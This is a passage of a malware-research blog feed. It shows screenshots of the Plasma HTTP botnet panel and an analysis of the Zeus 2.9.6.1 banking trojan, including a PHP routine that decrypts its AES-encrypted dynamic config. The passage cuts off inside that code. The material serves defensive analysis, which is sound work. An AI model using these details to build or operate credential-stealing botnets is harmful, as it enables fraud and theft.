&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmR1uqsI6vB9pbcgVssUsGkMhn8wrtoDmmAgwPoy1et5_cIxwzRMRtXO8zQTPnRfi-Y6WSC4ho7BCTT-vKaI-Gizdid4hzMSg1xSmI_Ldh05kIjfgD4TO2vEkhy8NpSrp7RO3d32QpwhU/s1600/OPM.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmR1uqsI6vB9pbcgVssUsGkMhn8wrtoDmmAgwPoy1et5_cIxwzRMRtXO8zQTPnRfi-Y6WSC4ho7BCTT-vKaI-Gizdid4hzMSg1xSmI_Ldh05kIjfgD4TO2vEkhy8NpSrp7RO3d32QpwhU/s1600/OPM.jpg&quot; height=&quot;400&quot; width=&quot;277&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
</description><link>https://www.xylibox.com/2014/03/zeus-1134.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgimmriXRVKKaaSDYl5zAcFHZ6fTN7I2OdrY-Y-uMMEdXRwCndcSiLnxkcVE8gbIZgorUHNMm4H_bWF11ZYJw1ILilSWUPGxGqYrCCtVKaErI12jOi4-tnsCAPdssFD_4snPqB7lPrHN8E/s72-c/04-03-2014+18-38-34.png" height="72" width="72"/><thr:total>3</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-6662619202876533242</guid><pubDate>Fri, 14 Feb 2014 22:19:00 +0000</pubDate><atom:updated>2014-02-14T23:19:03.180+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">plasma HTTP</category><title>Plasma HTTP</title><description>Advert:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCG8zTNWaqcyPOKLZXvZlUrZ9IVwisZsOpOZork98A9ZyY1HFz-Meyj7-fXsm1LKEwm2CmN5uebll1iIkt7hVKTQX2cKeso_zmPC8ZrHqg7wRCpUI11GuVxZ2PZ9ktXqqGc0mCt1Hwdys/s1600/02-01-2014+21-51-26.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCG8zTNWaqcyPOKLZXvZlUrZ9IVwisZsOpOZork98A9ZyY1HFz-Meyj7-fXsm1LKEwm2CmN5uebll1iIkt7hVKTQX2cKeso_zmPC8ZrHqg7wRCpUI11GuVxZ2PZ9ktXqqGc0mCt1Hwdys/s1600/02-01-2014+21-51-26.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Login:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIrbTnmMUG12nukGinh_6bJzV-kmb_TZpxUUBUVAGnJe72l1_AEng3vKF4XN-ZL2JqiYj2kqFNJK3b_9mC2jr-KrenM_0PFXHQUVVEner-PJXS8avBOwINuPToLdlcfYSL5WmNsUTMmus/s1600/01-01-2014+02-26-45.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIrbTnmMUG12nukGinh_6bJzV-kmb_TZpxUUBUVAGnJe72l1_AEng3vKF4XN-ZL2JqiYj2kqFNJK3b_9mC2jr-KrenM_0PFXHQUVVEner-PJXS8avBOwINuPToLdlcfYSL5WmNsUTMmus/s400/01-01-2014+02-26-45.png&quot; height=&quot;275&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Online bot:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnuad_lDnllRrpE-AlsREghWI_hjEBl4ggNRwnKqdtUnjI3XCKWHR6UAhdYWi_PVQ3FJ8tvxkq9fxmO1Lc_cX3y3gqo7nS5Tazc7YFWbLtuaiZegXsZ9i52PPuXFpt2mDQbWHn9guPM2k/s1600/01-01-2014+02-29-28.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnuad_lDnllRrpE-AlsREghWI_hjEBl4ggNRwnKqdtUnjI3XCKWHR6UAhdYWi_PVQ3FJ8tvxkq9fxmO1Lc_cX3y3gqo7nS5Tazc7YFWbLtuaiZegXsZ9i52PPuXFpt2mDQbWHn9guPM2k/s400/01-01-2014+02-29-28.png&quot; height=&quot;390&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
offline bots:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjP6L6cfeBowqxx9-6sHZrzDhHQasS6Zje07bga9mkikoGOWpFonNe3ojZqBSpcBnBuEESVjfhLt6Ey54TxhVSA3sr85E4ZpJJfAMC_U5BnriZ7CbswgahoNK6e-OSZypN1mCbCjEXMvw/s1600/01-01-2014+02-34-26.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjP6L6cfeBowqxx9-6sHZrzDhHQasS6Zje07bga9mkikoGOWpFonNe3ojZqBSpcBnBuEESVjfhLt6Ey54TxhVSA3sr85E4ZpJJfAMC_U5BnriZ7CbswgahoNK6e-OSZypN1mCbCjEXMvw/s400/01-01-2014+02-34-26.png&quot; height=&quot;390&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Commands:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7q3TbJFbTt4wgPUUJtAlI-XGonwWBGML6jYXFPyRAX6uV3de6w2vd1rJC3Ox1XaeopVqLAZKfpzqjUSHtPrj9GwB6ls9cSAVi2TlNQDcyVlWUvtHwsT1fLoDBRYO8y2ql2gu0LqNaCOw/s1600/01-01-2014+02-41-50.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7q3TbJFbTt4wgPUUJtAlI-XGonwWBGML6jYXFPyRAX6uV3de6w2vd1rJC3Ox1XaeopVqLAZKfpzqjUSHtPrj9GwB6ls9cSAVi2TlNQDcyVlWUvtHwsT1fLoDBRYO8y2ql2gu0LqNaCOw/s400/01-01-2014+02-41-50.png&quot; height=&quot;262&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Statistics:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXO-vUP993vqFiqGEWK9jzSv-g0ylvp5xE1w1Z2i0SWgg3Zn_j_IglvYJ-3MJNdpcKHdd5RWcMNXT_IK0YEMclvbOW4HkfmCiIc_5vCSGmZF-wM1fdxUjxoXZ-9_vM96YsskcRK-SFr5E/s1600/01-01-2014+02-43-06.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXO-vUP993vqFiqGEWK9jzSv-g0ylvp5xE1w1Z2i0SWgg3Zn_j_IglvYJ-3MJNdpcKHdd5RWcMNXT_IK0YEMclvbOW4HkfmCiIc_5vCSGmZF-wM1fdxUjxoXZ-9_vM96YsskcRK-SFr5E/s400/01-01-2014+02-43-06.png&quot; height=&quot;231&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Logs:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPfxVLSp81kodVUIGLBKoEpkEJvlBRtH1upAtyr7SpqU_IkKdm3jntvXKKFJ8VJC6ccL5vBbBe_l-046A1cqhVITA4yMCFnVan1fpVBd8Y6TXuI32WK5LL1YdA_ATdopnncr5c6GHJUD4/s1600/01-01-2014+02-45-21.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPfxVLSp81kodVUIGLBKoEpkEJvlBRtH1upAtyr7SpqU_IkKdm3jntvXKKFJ8VJC6ccL5vBbBe_l-046A1cqhVITA4yMCFnVan1fpVBd8Y6TXuI32WK5LL1YdA_ATdopnncr5c6GHJUD4/s400/01-01-2014+02-45-21.png&quot; height=&quot;216&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVoHKAglsoQSWTpLvE2KNIJi8TPr_Qp5WdlkWcZBpZ61ab1_7pSjFjbPJd0oZJ-ugbrSdNpdH8qiCnZnDdN-549YRmtnHgbbcYDqa5rHpmhZJFk2k3ecwKaBPGkHSr1MFDF7c3lDeQNlM/s1600/14-02-2014+21-23-26.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVoHKAglsoQSWTpLvE2KNIJi8TPr_Qp5WdlkWcZBpZ61ab1_7pSjFjbPJd0oZJ-ugbrSdNpdH8qiCnZnDdN-549YRmtnHgbbcYDqa5rHpmhZJFk2k3ecwKaBPGkHSr1MFDF7c3lDeQNlM/s1600/14-02-2014+21-23-26.png&quot; height=&quot;67&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Yeah take this lame article to second degree, i just talk about Plasma because i&#39;ve promised to write something today on irc.&lt;br /&gt;
&lt;br /&gt;
I&#39;m not dead but there nothing interesting to review for the moment, only crappy bots&lt;br /&gt;
That also one of the reason i haven&#39;t talked of &lt;a href=&quot;http://www.kernelmode.info/forum/viewtopic.php?f=16&amp;amp;t=1756&amp;amp;start=160#p22150&quot;&gt;JackPos&lt;/a&gt; and all the rest.&lt;br /&gt;
I have some interesting things but it&#39;s too sensitive for the moment and when it&#39;s not the reason, it&#39;s due to people who request me to don&#39;t talk of a subject because they want to cover it &#39;first&#39; for their company but who finaly write nothing, so i still wait (you know who you are)&lt;br /&gt;
e.g: &lt;a href=&quot;http://www.kernelmode.info/forum/viewtopic.php?f=16&amp;amp;t=474&amp;amp;start=230#p22139&quot;&gt;ZeusVM&lt;/a&gt;, i wanted to talk about the weird version who appeared since some months now&lt;br /&gt;
a version who download from sites (on ssl and fastflux) a picture with a config embedded inside.. but well, fuck it now.&lt;br /&gt;
As i already told on a previous article, i may appear inactive but i&#39;m not so inactive.&lt;br /&gt;
I&#39;ve recently do &lt;a href=&quot;http://cybercrime-tracker.net/zbox.php&quot;&gt;this&lt;/a&gt;, i still continue to posts malwares, break things but without necessarily talking about it or just briefly like for jackTrash, and today: PlasmaTrash, and &lt;a href=&quot;http://www.kernelmode.info/forum/viewtopic.php?f=16&amp;amp;t=3166&quot;&gt;iTrashing&lt;/a&gt;.&lt;br /&gt;
I still continue to do &lt;a href=&quot;http://www.youtube.com/watch?v=xdC0sONiCI4&quot;&gt;trashy&lt;/a&gt; video, show trashy things on my &lt;a href=&quot;http://www.hackgyver.org/&quot;&gt;hackerspace&lt;/a&gt; and talk about trashs on &lt;a href=&quot;https://twitter.com/MalwareTechBlog/status/433277311467520000&quot;&gt;irc&lt;/a&gt;. (yeah that a lot of trash)&lt;br /&gt;
So for the moment, i just wait and see... </description><link>https://www.xylibox.com/2014/02/plasma-http.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCG8zTNWaqcyPOKLZXvZlUrZ9IVwisZsOpOZork98A9ZyY1HFz-Meyj7-fXsm1LKEwm2CmN5uebll1iIkt7hVKTQX2cKeso_zmPC8ZrHqg7wRCpUI11GuVxZ2PZ9ktXqqGc0mCt1Hwdys/s72-c/02-01-2014+21-51-26.png" height="72" width="72"/><thr:total>3</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-1715151677665487452</guid><pubDate>Sat, 11 Jan 2014 17:18:00 +0000</pubDate><atom:updated>2014-01-11T18:23:32.673+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">php</category><category domain="http://www.blogger.com/atom/ns#">Zbot</category><category domain="http://www.blogger.com/atom/ns#">ZeuS</category><category domain="http://www.blogger.com/atom/ns#">Zeus 2.9.6.1</category><category domain="http://www.blogger.com/atom/ns#">ZeusAES</category><title>Decoding Zeus 2.9.6.1 dynamic config</title><description>I got a look on the zeus builder who was released by the MMBB guy on exploit.in, finally i&#39;m decided to write something about it, so let&#39;s talk about the change in the config encryption.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-XfLKAVlZNV2wypPwWNQ2mNl57CEKvEfxb67CdkXKcKm-ngjohPADb2zSHU5EjnJ0k8ur6HokiF99t8ATvmiL1E0lcOQ6CdsnfcaM1jdg6cYLlyKVhHN1dknRHOXzDMWhhU7Y7OmQemM/s1600/11-01-2014+14-53-52.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-XfLKAVlZNV2wypPwWNQ2mNl57CEKvEfxb67CdkXKcKm-ngjohPADb2zSHU5EjnJ0k8ur6HokiF99t8ATvmiL1E0lcOQ6CdsnfcaM1jdg6cYLlyKVhHN1dknRHOXzDMWhhU7Y7OmQemM/s1600/11-01-2014+14-53-52.png&quot; height=&quot;263&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
MD5: &lt;a href=&quot;https://www.virustotal.com/en/file/382e34d713572348c76eb81313ead3066da307b5b7a3cede83484b7fb235b1dc/analysis/1388760471/&quot;&gt;0a05783316e7f765e731aadf5098564f&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
This version use AES instead of RC4 and can interact with the latest version of Firefox.&lt;br /&gt;
Anyway it&#39;s nothing more than a basic Zeus v2.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhk8a2t8dQmhyHvjo4d9f-VvhRVfkbJCJQQsIN9cq9AfDjVdJ4oT6I2yF41TQMC1Ix2kdGDRCFmnuD7lnNWxOHe4RY2AZcvXXHG8waclvVYfcwlV60OzKWKgJkX6Hy4jF2qEH4eUJwQNx0/s1600/11-01-2014+15-02-10.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhk8a2t8dQmhyHvjo4d9f-VvhRVfkbJCJQQsIN9cq9AfDjVdJ4oT6I2yF41TQMC1Ix2kdGDRCFmnuD7lnNWxOHe4RY2AZcvXXHG8waclvVYfcwlV60OzKWKgJkX6Hy4jF2qEH4eUJwQNx0/s1600/11-01-2014+15-02-10.png&quot; height=&quot;300&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
iBank parser on the panel, monitoring of process:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3qxT14Kjzd9oiAPFxcur2t5e8O_pxrn7v51Q6CRkwpiBEu8OdzJSAXNGq3TgFkfbuaZXCLrTUXXCcPtudliT6ZR46V_wwTsYE9S7W64abXKOG9WPd51ADDSYcv_oMplqESDPn9Ei-eAM/s1600/11-01-2014+15-13-33.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3qxT14Kjzd9oiAPFxcur2t5e8O_pxrn7v51Q6CRkwpiBEu8OdzJSAXNGq3TgFkfbuaZXCLrTUXXCcPtudliT6ZR46V_wwTsYE9S7W64abXKOG9WPd51ADDSYcv_oMplqESDPn9Ei-eAM/s1600/11-01-2014+15-13-33.png&quot; height=&quot;273&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
About the panel, the released version require Ioncube loader (nvm, the gate code can be recovered easily) &lt;br /&gt;
&lt;br /&gt;
Now let&#39;s view an example of report from modules, keylog+screenshot:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-8MCW6RCPLKtiX5wu2d_YGj9VDvid3Dawph5pBGv4jeVIF1sDmqqj0RVSsgY-r4WWtFg3VZ-MlAyKSF72J5pPNP4yhw7R6kH8wuYJufypRpAvhbEvs14oVQY02EcJ0q-4dokgTMLGdpc/s1600/11-01-2014+16-26-41.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-8MCW6RCPLKtiX5wu2d_YGj9VDvid3Dawph5pBGv4jeVIF1sDmqqj0RVSsgY-r4WWtFg3VZ-MlAyKSF72J5pPNP4yhw7R6kH8wuYJufypRpAvhbEvs14oVQY02EcJ0q-4dokgTMLGdpc/s1600/11-01-2014+16-26-41.png&quot; height=&quot;175&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6Liz6o95NVOJFmlsuLtUo_jQq6vsGgKot4bEgs6q6WGiyx7rNEObOS0263h1AbpvxbMHkqSSd3L3HExm1Nz1mW9dtT5SMzX9sTk1TdLF_SoqODa690NXnv5EJYNhxtbTK55dD_YZTXWA/s1600/KScn_f.jpeg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6Liz6o95NVOJFmlsuLtUo_jQq6vsGgKot4bEgs6q6WGiyx7rNEObOS0263h1AbpvxbMHkqSSd3L3HExm1Nz1mW9dtT5SMzX9sTk1TdLF_SoqODa690NXnv5EJYNhxtbTK55dD_YZTXWA/s1600/KScn_f.jpeg&quot; height=&quot;300&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Part of the static config (in plain on generated bot):&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-9zxnDuTzKeB_LlmCYddaA_WrOeZ0dUKcw_4MJvKQ3IC4haoS5OGqc_qZQAwjjt1FJW5Y5Zg1Mw-dX9yGLhMk2n6GIFcNLeOxo3Kr54gJPIFtyH4yaMz0E3dcYuZ5CDNXN9xu_cJ-okA/s1600/11-01-2014+16-48-22.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-9zxnDuTzKeB_LlmCYddaA_WrOeZ0dUKcw_4MJvKQ3IC4haoS5OGqc_qZQAwjjt1FJW5Y5Zg1Mw-dX9yGLhMk2n6GIFcNLeOxo3Kr54gJPIFtyH4yaMz0E3dcYuZ5CDNXN9xu_cJ-okA/s1600/11-01-2014+16-48-22.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Installation process/dynamic config decoding (beware, dubstep):&lt;br /&gt;
&lt;center&gt;
&lt;iframe allowfullscreen=&quot;&quot; frameborder=&quot;0&quot; height=&quot;315&quot; src=&quot;//www.youtube.com/embed/Z7tEwl1YvMg&quot; width=&quot;420&quot;&gt;&lt;/iframe&gt;&lt;/center&gt;
&lt;br /&gt;
And a small code because it&#39;s easier to understand:&lt;br /&gt;
&lt;div class=&quot;php&quot; style=&quot;background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;&quot;&gt;
&lt;span style=&quot;color: black; font-weight: bold;&quot;&gt;&amp;lt;?php&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;span style=&quot;color: black; font-weight: bold;&quot;&gt;function&lt;/span&gt; decode&lt;span style=&quot;color: #009900;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$data&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; &lt;span style=&quot;color: #000088;&quot;&gt;$key&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;)&lt;/span&gt; &lt;span style=&quot;color: #009900;&quot;&gt;{&lt;/span&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;span style=&quot;color: #000088;&quot;&gt;$td&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; &lt;a href=&quot;http://www.php.net/mcrypt_module_open&quot; style=&quot;color: #000060;&quot;&gt;&lt;span style=&quot;color: #990000;&quot;&gt;mcrypt_module_open&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;color: #009900;&quot;&gt;(&lt;/span&gt;MCRYPT_RIJNDAEL_128&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; &lt;span style=&quot;color: blue;&quot;&gt;&#39;&#39;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; MCRYPT_MODE_ECB&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; &lt;span style=&quot;color: blue;&quot;&gt;&#39;&#39;&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;)&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;span style=&quot;color: #000088;&quot;&gt;$iv&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; &lt;a href=&quot;http://www.php.net/mcrypt_create_iv&quot; style=&quot;color: #000060;&quot;&gt;&lt;span style=&quot;color: #990000;&quot;&gt;mcrypt_create_iv&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;color: #009900;&quot;&gt;(&lt;/span&gt;&lt;a href=&quot;http://www.php.net/mcrypt_enc_get_iv_size&quot; style=&quot;color: #000060;&quot;&gt;&lt;span style=&quot;color: #990000;&quot;&gt;mcrypt_enc_get_iv_size&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;color: #009900;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$td&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;)&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; MCRYPT_RAND&lt;span style=&quot;color: #009900;&quot;&gt;)&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;a href=&quot;http://www.php.net/mcrypt_generic_init&quot; style=&quot;color: #000060;&quot;&gt;&lt;span style=&quot;color: #990000;&quot;&gt;mcrypt_generic_init&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;color: #009900;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$td&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; &lt;span style=&quot;color: #000088;&quot;&gt;$key&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; &lt;span style=&quot;color: #000088;&quot;&gt;$iv&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;)&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;a href=&quot;http://www.php.net/mcrypt_generic&quot; style=&quot;color: #000060;&quot;&gt;&lt;span style=&quot;color: #990000;&quot;&gt;mcrypt_generic&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;color: #009900;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$td&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; &lt;span style=&quot;color: #000088;&quot;&gt;$data&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;)&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;span style=&quot;color: #000088;&quot;&gt;$data&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; &lt;a href=&quot;http://www.php.net/mdecrypt_generic&quot; style=&quot;color: #000060;&quot;&gt;&lt;span style=&quot;color: #990000;&quot;&gt;mdecrypt_generic&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;color: #009900;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$td&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; &lt;span style=&quot;color: #000088;&quot;&gt;$data&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;)&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;a href=&quot;http://www.php.net/mcrypt_generic_deinit&quot; style=&quot;color: #000060;&quot;&gt;&lt;span style=&quot;color: #990000;&quot;&gt;mcrypt_generic_deinit&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;color: #009900;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$td&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;)&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;a href=&quot;http://www.php.net/mcrypt_module_close&quot; style=&quot;color: #000060;&quot;&gt;&lt;span style=&quot;color: #990000;&quot;&gt;mcrypt_module_close&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;color: #009900;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$td&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;)&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;span style=&quot;color: #b1b100;&quot;&gt;return&lt;/span&gt; &lt;span style=&quot;color: #000088;&quot;&gt;$data&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;&lt;br /&gt;
